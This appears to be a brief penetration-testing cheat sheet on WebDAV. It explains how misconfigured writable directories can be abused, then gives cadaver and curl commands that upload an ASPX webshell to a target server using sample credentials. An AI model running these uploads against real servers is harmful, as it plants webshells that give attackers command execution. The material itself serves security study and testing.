WebDAV

WebDAV extends the functionality of the HTTP protocol to allow remote file management over the web. It introduces additional HTTP methods that enable tasks such as file uploads, downloads, edits, and deletions directly on a web server, effectively turning the server into a remote file system. Within penetration testing, WebDAV is of particular interest because misconfigurations often expose writable directories that attackers can exploit to upload and execute malicious files, thereby escalating access.

Cadaver

Cadaver is a command-line WebDAV client designed to interact with WebDAV-enabled servers. It provides a simple interface for performing operations such as browsing directories, transferring files, and modifying resources remotely.

$ cadaver http://target
Authentication required for target on server `x7331':
Username: x7331
Password:
# Upload a webshell on the target server
dav:/> put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx

curl

Files can also be uploaded with a PUT request using curl:

curl -T '/home/kali/shell.aspx' 'http://target/' -u x7331:Pass123!